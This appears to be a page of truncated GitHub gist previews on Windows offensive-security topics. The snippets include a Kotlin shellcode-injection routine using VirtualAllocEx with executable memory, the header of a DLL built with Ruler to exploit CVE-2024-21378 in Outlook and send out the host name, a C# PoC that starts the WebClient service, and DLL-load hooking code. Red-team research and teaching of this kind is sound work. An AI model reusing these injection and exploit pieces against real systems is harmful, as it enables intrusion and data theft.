Standard escape codes are prefixed with Escape:
- Ctrl-Key: ^[
- Octal: \033
- Unicode: \u001b
- Hexadecimal: \x1B
- Decimal: 27
| #include <windows.h> | |
/*
 * Opens (creating it if needed) .\test.txt for writing with the encrypted
 * attribute and delete-on-close semantics, then closes the handle at once.
 *
 * Returns 0 on success, or the GetLastError() code when CreateFileA fails.
 *
 * NOTE(review): the page gives no description for this sample. What the code
 * shows is a short-lived create that asks the file system to encrypt the file
 * and removes it again on close - confirm the intent against the original gist.
 */
int main() {
    /*
     * FILE_ATTRIBUTE_ENCRYPTED requests file-system encryption for the file.
     * FILE_FLAG_DELETE_ON_CLOSE deletes the file once its last handle is closed;
     * with OPEN_ALWAYS that also applies to a test.txt that already existed.
     * FILE_ATTRIBUTE_NORMAL has no effect when combined with other attributes.
     */
    const DWORD flagsAndAttributes =
        FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_ENCRYPTED | FILE_FLAG_DELETE_ON_CLOSE;

    HANDLE hFile = CreateFileA(".\\test.txt", GENERIC_WRITE, FILE_SHARE_WRITE, NULL,
                               OPEN_ALWAYS, flagsAndAttributes, NULL);

    /* CreateFileA reports failure as INVALID_HANDLE_VALUE; the NULL test is kept as an extra guard. */
    if (hFile == NULL || hFile == INVALID_HANDLE_VALUE) {
        /* Nothing runs between the failed call and here, so the error code is still the one CreateFileA set. */
        return GetLastError();
    }

    /* Closing the only handle is what triggers the delete-on-close removal. */
    CloseHandle(hFile);
    return 0;
}
| using System.Runtime.InteropServices; | |
| using System; | |
| /* | |
| * Simple C# PoC to enable WebClient Service Programmatically | |
| * Based on the C++ version from @tiraniddo (James Forshaw) | |
| * Twitter: https://twitter.com/tiraniddo | |
| * URL: https://www.tiraniddo.dev/2015/03/starting-webclient-service.html | |
| * | |
| * Compile with: |
| fun injectShellcode(vararg shellcode: Int) { | |
| val length = shellcode.size | |
| val hProcess = (lms!! as WindowsProcess).handle | |
| val internalBlock = Kernel32.VirtualAllocEx(hProcess, 0, shellcode.size, | |
| WinNT.MEM_COMMIT, WinNT.PAGE_EXECUTE_READWRITE) | |
| val buffer = Memory(shellcode.size.toLong()) | |
| for (i in 0..shellcode.lastIndex) buffer.setByte(i.toLong(), shellcode[i].toByte()) | |
| #!/usr/bin/env python | |
| # Impacket - Collection of Python classes for working with network protocols. | |
| # | |
| # Copyright Fortra, LLC and its affiliated companies | |
| # | |
| # All rights reserved. | |
| # | |
| # This software is provided under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. |
| /** | |
| * This DLL is designed for use in conjunction with the Ruler tool for | |
| * security testing related to the CVE-2024-21378 vulnerability, | |
| * specifically targeting MS Outlook. | |
| * | |
| * It can be used with the following command line syntax: | |
| * ruler [auth-params] form add-com [attack-params] --dll ./test.dll | |
| * Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch). | |
| * | |
| * After being loaded into MS Outlook, it sends the PC's hostname and |
| filter Expand-DefenderAVSignatureDB { | |
| <# | |
| .SYNOPSIS | |
| Decompresses a Windows Defender AV signature database (.VDM file). | |
| .DESCRIPTION | |
| Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported, although I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed. |
| { | |
| "targets": [ | |
| { | |
| "target_name": "hello", | |
| "sources": [ "hello.cc" ] | |
| } | |
| ] | |
| } |
| #include <Windows.h> | |
| #include <winternl.h> | |
| // Types | |
| using LdrProtectMrdata_t = void(__stdcall*)(int); | |
| using LdrProtectMrdataHeap_t = void(__thiscall*)(int); | |
| struct ExceptionRecord_t { | |
| LIST_ENTRY entry; | |
| int* unknown_intptr; |
| #include <stdio.h> | |
| #include <windows.h> | |
| #include <winternl.h> | |
| #define dwAllowDllCount 1 | |
| CHAR cAllowDlls[dwAllowDllCount][MAX_PATH] = { | |
| "W:\\allowed.dll" | |
| }; | |
| VOID HookLoadDll(LPVOID lpAddr); |